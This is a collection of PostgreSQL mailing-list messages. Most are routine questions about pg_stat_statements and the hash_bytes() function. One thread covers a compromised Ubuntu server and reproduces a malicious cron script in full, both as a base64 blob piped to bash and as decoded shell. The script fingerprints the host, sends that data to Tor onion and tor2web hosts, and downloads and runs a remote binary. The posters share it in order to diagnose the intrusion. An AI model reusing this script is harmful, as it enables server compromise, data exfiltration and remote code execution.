Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours
On Mon, Jan 02, 2023 at 08:53:32AM +0200, Antonis Christodoulou wrote: > And for the record, Ahmet, here’s a weird cron job: > > christan@vultr:~$ sudo crontab -l -u postgres > 13 * * * * > /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > > /dev/null 2>&1 & > > Had no idea somebody can add something like this externally... Just to be clear, having a superuser connection is basically the same as having a shell open on the server running with the postgres (or the OS user running the postgres service) user. If your postgres OS user is a member of the cron group it can add its own entry easily, the rest being stored in a postgres-owned directory.
Re: Exact same output - pg_stat_statements
On Mon, Jan 02, 2023 at 02:34:13PM +0100, hubert depesz lubaczewski wrote: > On Fri, Dec 30, 2022 at 11:04:59AM -0500, Rushikesh socha wrote: > > Hi, Whenever I am running the below query on one of my Azure PostgreSQL > > PaaS instances I am getting exact same output. I feel it shows old > > information but as far as i know pg_stat_statements only shows current > > information and not past right ? It may be a bug? > > pg_stat_statements has all the data since last reset of stats. > > So if you never reset stats, it accumulated data for howeve rlong you > are using pg. > > Not really surprising that top total-time uses are the same. > > If you want to sensibly use it you should call reset function every now > and then. Resetting the data adds some noticeable overhead as newly added entries will need to generate a normalize query string and so on. What most people do is taking regular snapshots of pg_stat_statements (and other stats) view and then compare the snapshots. There are a few open source projects doing that available.
Re: what kind of hash algorithm is used by hash_bytes()?
Hi, On Tue, Jan 03, 2023 at 12:30:27AM +0800, jack...@gmail.com wrote: > jack...@gmail.com > -- > I can't understand the hash_bytes() func in > src/backend/access/hash/hashfunc.c, it's published by a paper or others? > Can you give me some materials to study it in depth? It's documented at the beginning of hashfn.c.
Re: what kind of hash algorithm is used by hash_bytes()?
On 1/2/23 08:30, jack...@gmail.com wrote: jack...@gmail.com -- I can't understand the hash_bytes() func in src/backend/access/hash/hashfunc.c, it's published by a paper or others? Can you give me some materials to study it in depth? Check out the README in: src/backend/access/hash/ -- Adrian Klaver adrian.kla...@aklaver.com
what kind of hash algorithm is used by hash_bytes()?
jack...@gmail.com -- I can't understand the hash_bytes() func in src/backend/access/hash/hashfunc.c, it's published by a paper or others? Can you give me some materials to study it in depth?
Re: Exact same output - pg_stat_statements
On Fri, Dec 30, 2022 at 11:04:59AM -0500, Rushikesh socha wrote: > Hi, Whenever I am running the below query on one of my Azure PostgreSQL > PaaS instances I am getting exact same output. I feel it shows old > information but as far as i know pg_stat_statements only shows current > information and not past right ? It may be a bug? pg_stat_statements has all the data since last reset of stats. So if you never reset stats, it accumulated data for howeve rlong you are using pg. Not really surprising that top total-time uses are the same. If you want to sensibly use it you should call reset function every now and then. Best regards, depesz
Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours
El día Montag, Januar 02, 2023 a las 11:54:53 +0300, Ebubekir Büyüktosun escribió: >Hey Antonis, > > > >If you decode the below Base64 code, you will see the following bash >script that is tried to execute on your machine; > > ... Without analyzing the shell code in detail, this is clear evidence of an attack. You must purge the full operating system and reinstall it from scratch with better credentials of Linux and later PostgreSQL. matthias -- Matthias Apitz, ✉ g...@unixarea.de, http://www.unixarea.de/ +49-176-38902045 Public GnuPG key: http://www.unixarea.de/key.pub
Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours
Hey Antonis, If you decode the below Base64 code, you will see the following bash script that is tried to execute on your machine; x8C8W8llVk0Rzccy9N0ggCOI2VBAcexec &>/dev/nullexport PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)c=$(echo "curl -4fsSLkA- -m200")t=$(echo "4iucigxvlfx4vcqn5sordersaa3a3ztjcaoszptxxo5b3pbn6nlwsfad") sockz() {n=(dns.twnic.tw doh-ch.blahdns.com doh-de.blahdns.com doh-fi.blahdns.com doh-jp.blahdns.com doh.li doh.pub doh-sg.blahdns.com fi.doh.dns.snopyta.org dns.digitalsize.net)p=$(echo "dns-query?name=relay.tor2socks.in")q=${n[$((RANDOM%${#n[@]}))]}s=$($c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1)} fexe() {for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done} u() {sockzf=/int.$(uname -m)x=./$(date|md5sum|cut -f1 -d-)r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$rchmod +x $x;$x;rm -f $x} for h in tor2web.in tor2web.itdoif ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; thenfexe;u $t.$hls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)elsebreakfidone 02.01.2023, 11:37, "Antonis Christodoulou" :Hey Matthias, here it is: christan@vultr:~$ sudo cat /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh#!/bin/bashexec &>/dev/nullecho x8C8W8llVk0Rzccy9N0ggCOI2VBAcecho eDhDOFc4bGxWazBSemNjeTlOMGdnQ09JMlZCQWMKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAiNGl1Y2lneHZsZng0dmNxbjVzb3JkZXJzYWEzYTN6dGpjYW9zenB0eHhvNWIzcGJuNm5sd3NmYWQiKQoKc29ja3ooKSB7Cm49KGRucy50d25pYy50dyBkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYWhkbnMuY29tIGRvaC1maS5ibGFoZG5zLmNvbSBkb2gtanAuYmxhaGRucy5jb20gZG9oLmxpIGRvaC5wdWIgZG9oLXNnLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmRpZ2l0YWxzaXplLm5ldCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnE9JHtuWyQoKFJBTkRPTSUkeyNuW0BdfSkpXX0Kcz0kKCRjIGh0dHBzOi8vJHEvJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8dGFpbCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash On 2 Jan 2023, at 9:46 AM, Matthias Apitz wrote: El día lunes, enero 02, 2023 a las 08:53:32a. m. +0200, Antonis Christodoulou escribió: And for the record, Ahmet, here’s a weird cron job:christan@vultr:~$ sudo crontab -l -u postgres13 * * * * /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &Had no idea somebody can add something like this externally...Please post the content of this script.matthias--Matthias Apitz, ✉ g...@unixarea.de, http://www.unixarea.de/ +49-176-38902045Public GnuPG key: http://www.unixarea.de/key.pub İyi çalışmalar Best Regards
Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours
Hey Matthias, here it is: christan@vultr:~$ sudo cat /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh #!/bin/bash exec &>/dev/null echo x8C8W8llVk0Rzccy9N0ggCOI2VBAc echo eDhDOFc4bGxWazBSemNjeTlOMGdnQ09JMlZCQWMKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAiNGl1Y2lneHZsZng0dmNxbjVzb3JkZXJzYWEzYTN6dGpjYW9zenB0eHhvNWIzcGJuNm5sd3NmYWQiKQoKc29ja3ooKSB7Cm49KGRucy50d25pYy50dyBkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYWhkbnMuY29tIGRvaC1maS5ibGFoZG5zLmNvbSBkb2gtanAuYmxhaGRucy5jb20gZG9oLmxpIGRvaC5wdWIgZG9oLXNnLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmRpZ2l0YWxzaXplLm5ldCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnE9JHtuWyQoKFJBTkRPTSUkeyNuW0BdfSkpXX0Kcz0kKCRjIGh0dHBzOi8vJHEvJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8dGFpbCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash > On 2 Jan 2023, at 9:46 AM, Matthias Apitz wrote: > > El día lunes, enero 02, 2023 a las 08:53:32a. m. +0200, Antonis Christodoulou > escribió: > >> And for the record, Ahmet, here’s a weird cron job: >> >> christan@vultr:~$ sudo crontab -l -u postgres >> 13 * * * * >> /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > >> /dev/null 2>&1 & >> >> Had no idea somebody can add something like this externally... > > Please post the content of this script. > > matthias > > > -- > Matthias Apitz, ✉ g...@unixarea.de, http://www.unixarea.de/ +49-176-38902045 > Public GnuPG key: http://www.unixarea.de/key.pub
